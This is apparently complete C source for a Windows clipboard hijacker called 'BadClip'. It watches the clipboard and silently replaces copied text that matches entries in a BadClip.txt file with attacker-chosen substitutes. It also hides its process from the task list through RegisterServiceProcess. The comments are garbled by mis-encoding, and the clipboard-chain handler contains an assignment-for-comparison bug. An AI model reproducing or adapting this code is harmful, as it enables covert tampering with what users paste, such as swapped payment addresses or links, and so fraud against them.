#include <windows.h>
#include <stdio.h>

#include "/BSC/FArray.h"
#include "/BSC/FString.h"
#include "/BSC/Args.h"
#include "/BSC/FileKit.h"

struct Table
{
    FString sFrom;
    FString sTo;
};

HINSTANCE hInst; //ʵ
HWND hwnd;       //
HWND hNext;      //һܼϢĴ

FArray<Table> aList;

//޸ļ
void ChangeClip()
{
    HANDLE hData;
    FString sClipText;

    if(OpenClipboard(hwnd)==NULL)return;

    hData=GetClipboardData(CF_TEXT);
    if (!(hData))
    {
        CloseClipboard();
        return;
    }

    sClipText=(char *)GlobalLock(hData);
    sClipText=trim(strlwr(sClipText));
    GlobalUnlock(hData);

    for(unsigned int i=0; i<aList.GetCount(); i++)
    {
        if(sClipText==aList[i].sFrom)
        {
            hData=GlobalAlloc(GMEM_MOVEABLE|GMEM_DDESHARE, aList[i].sTo.GetLength()+1);
            lstrcpy((char *)GlobalLock(hData), aList[i].sTo);
            GlobalUnlock(hData);
            EmptyClipboard();
            SetClipboardData(CF_TEXT, hData);
            break;
        }
    }

    CloseClipboard();
}

LRESULT CALLBACK WndProc(HWND hwnd,UINT uMessage,
    WPARAM wparam,LPARAM lparam)
{
    switch(uMessage)
    {
    case WM_CREATE:
        hNext=SetClipboardViewer(hwnd);
        break;
    case WM_DRAWCLIPBOARD:
        SendMessage(hNext, uMessage, wparam, lparam);
        ChangeClip();
        break;
    case WM_CHANGECBCHAIN:
        if(hNext=(HWND)wparam)
            hNext=(HWND)lparam;
        break;
    case WM_CLOSE:
    case WM_QUIT:
        ChangeClipboardChain(hwnd, hNext);
        PostQuitMessage(0);
        break;
    default:
        return DefWindowProc(hwnd, uMessage, wparam, lparam);
    }

    return 0;
}

BOOL InitApp(HINSTANCE hInstance)
{
    WNDCLASSEX wc;

    wc.style         = CS_HREDRAW | CS_VREDRAW;
    wc.lpfnWndProc   = (WNDPROC)WndProc;
    wc.cbClsExtra    = 0;
    wc.cbWndExtra    = 0;
    wc.hInstance     = hInstance;
    wc.hIcon         = LoadIcon(hInstance, IDI_APPLICATION);
    wc.hCursor       = LoadCursor(NULL,IDC_ARROW);
    wc.hbrBackground = (HBRUSH)(COLOR_BTNFACE+1);
    wc.lpszMenuName  = NULL;
    wc.lpszClassName = "BadClip";

    if (!RegisterClassEx(&wc))
    {
        if (!RegisterClass((LPWNDCLASS)&wc.style))
           return FALSE;
    }
    return TRUE;
}

BOOL InitInst(HINSTANCE hInstance, int nCmdShow)
{
    hInst = hInstance;

    hwnd = CreateWindow("BadClip",
                        "Bad Clip",
                        WS_OVERLAPPEDWINDOW,
                        CW_USEDEFAULT, 0,
                        CW_USEDEFAULT, 0,
                        NULL,
                        NULL,
                        hInstance,
                        NULL);

    if (!hwnd)
        return FALSE;

    return TRUE;
}

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    //ڡرճб
    HINSTANCE hKernelLib;
    typedef void (CALLBACK pRegFunction)(unsigned long,int);
    pRegFunction *RegisterServiceProcess;

    hKernelLib=LoadLibrary("kernel32.dll");
    if(hKernelLib)
    {
        RegisterServiceProcess=(pRegFunction *)GetProcAddress(hKernelLib,"RegisterServiceProcess");
        if(RegisterServiceProcess)
            RegisterServiceProcess(GetCurrentProcessId(), 1);
    }

    MSG msg;

    FString sInfo;
    sInfo=GetDirName(GetArguments(GetCommandLine())[0]);
    sInfo+="\\BadClip.txt";

    FILE *myFile;
    if((myFile=fopen(sInfo, "r"))==NULL)
        return 1;

    while(!feof(myFile))
    {
        Table temp;
        temp.sFrom.buffer(10240);
        temp.sTo.buffer(10240);

        fgets(temp.sFrom, 10240, myFile);
        if(!feof(myFile))
        {
            fgets(temp.sTo, 10240, myFile);
            if(temp.sFrom[temp.sFrom.GetLength()-1]=='\n')
                temp.sFrom[temp.sFrom.GetLength()-1]='\0';

            if(temp.sTo[temp.sTo.GetLength()-1]=='\n')
                temp.sTo[temp.sTo.GetLength()-1]='\0';

            temp.sFrom=trim(strlwr(temp.sFrom));
            temp.sTo  =trim(strlwr(temp.sTo));

            aList.Add(temp);
        }
    }

    fclose(myFile);

    if (!hPrevInstance)
        if (!InitApp(hInstance))
            return FALSE;

    if (!InitInst(hInstance, nCmdShow))
        return FALSE;

    while (GetMessage(&msg,NULL, 0, 0))
    {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }

    return 0;
}
